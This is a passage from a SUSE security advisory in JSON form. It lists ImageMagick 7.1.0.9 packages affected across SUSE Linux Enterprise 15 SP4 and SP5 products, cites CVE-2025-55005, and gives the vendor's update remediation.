"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55005",
"url": "https://www.suse.com/security/cve/CVE-2025-55005"
},
{
"category": "external",
"summary": "SUSE Bug 1248077 for CVE-2025-55005",
"url": "https://bugzilla.suse.com/1248077"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
